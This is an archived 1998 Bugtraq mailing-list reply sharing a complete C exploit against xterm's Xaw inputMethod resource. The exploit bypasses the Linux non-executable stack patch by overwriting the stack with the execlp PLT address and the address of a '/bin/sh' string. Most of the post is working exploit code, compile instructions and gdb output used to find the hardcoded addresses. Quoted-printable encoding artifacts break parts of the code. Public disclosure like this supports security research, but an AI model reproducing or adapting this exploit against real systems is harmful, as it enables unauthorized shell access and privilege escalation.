[7082] in bugtraq
Re: dip-3.3.7p exploit (stackpatch_
daemon@ATHENA.MIT.EDU (M.C.Mar)
Sun Jun 28 13:21:59 1998
Date: Sun, 28 Jun 1998 14:04:19 +0200
Reply-To: "M.C.Mar" <emsi@it.com.pl>
From: "M.C.Mar" <woloszyn@NOSPAM.IT.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.GSO.3.95.980626174552.25728A-100000@faui01a.informatik.uni-erlangen.de>
On Fri, 26 Jun 1998, Thomas Troeger wrote:
> Hi,
>
> While playing around with dip-3.3.7p I realized that the method I use=
d in my
> previous posting won't do. So I had a look at the source and develope=
d a new
> program. Here it goes:
>
(...)
So.. I also developed some time ago xploit that works around nonexecuta=
ble
stackpatch (Linux), but for xterm and Xaw vulnerability.
It seemt that defeating Sorar's stackpatch is easyier than we thought i=
f
program contains any exec* PLT entry. It it contains exec*p we may use =
any
string to execute ./_anystring_ if we have . in PATH variable.
So here goes my 'sploit:
$ cat 3xterm.c
/*
A simple xploit working around non-executable stack patch! ;)
Based on Solar Designer's: "Getting around non-executable stack(fix)" p=
ost and:
Rafa=B3 Wojtczuk's "Defeating Solar Designer'a Non-executable Stack Pat=
ch"
sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets based on
xterm_exp.c by alcuin
Compile it like this:
gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 =
-lc
Description:
The sploit simply puts the EXECLP address and its parameters addresses
onto the stack. To work fine you need to look for execlp Program Linkag=
e
Table entry in xterm and for "/bin/sh" string in its text segment...
emsi:~mcmar/hack# gdb xterm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for detai=
ls.
GDB 4.16 (i486-slackware-linux),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols fo=
und)...
(gdb) print execlp
$1 =3D {<text variable, no debug info>} 0x804bc78 <execlp>
(gdb) x/s 0x8063d2e
0x8063d2e <_fini+8158>: "/bin/sh"
0x804bc78 and 0x8063d2e are OK for me, but you may need to look for the
riht ones in your case... ;)
GreetZ: bulba, smierc, all of Lam3rZ teem and other Polish HackerZ ;)
*/
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"
#define EXECLP 0x804bc78 // execlp PLT adress in xterm
#define BIN_SH 0x8063d2e // "/bin/sh" string address in xterm ;)
int *ptr;
void main(int argc, char *argv[]) {
char *home;
FILE *f_in, *f_out;
char buff[16384];
char shellbuf[16384];
char *s;
int i;
if (home =3D getenv("HOME")) chdir(home);
if (!(f_out =3D fopen(NEWFILE, "w"))) {
perror("fopen");
exit(1);
}
if (f_in =3D fopen(CONFFILE, "r")) {
fseek(f_in,0,SEEK_SET);
while (!feof(f_in)) {
fgets(buff,16384,f_in);
for (s=3Dbuff;isblank(*s);s++);
if (strncmp(s,"xterm*inputMethod",17)<0)
fputs(buff,f_out);
}
fclose(f_in);
}
/* fill the buffer with nops */
memset(shellbuf, 0x90, sizeof(shellbuf));
shellbuf[sizeof(shellbuf)-1] =3D 0;
ptr =3D (int *)(shellbuf+1028);
*ptr++ =3DEXECLP;
*ptr++ =3DEXECLP;
*ptr++ =3DBIN_SH;
*ptr++ =3DBIN_SH;
*ptr++ =3D 0;
fputs("xterm*inputMethod:",f_out);
fputs(shellbuf, f_out);
fclose(f_out);
system("/bin/cp "CONFFILE" "OLDFILE);
system("/bin/mv -f "NEWFILE" "CONFFILE);
execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
It contains some useless stuff, but it's 'coz I just use normal xterm
soloit as a base.
RegardZ,
--
_______________________________________________________________________=
____
M.C.Mar An NT server can be run by an idiot, and usually is. emsi@i=
t.pl
"If you can't make it good, make it LOOK good." - Bill Gates
Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupo=
ty.
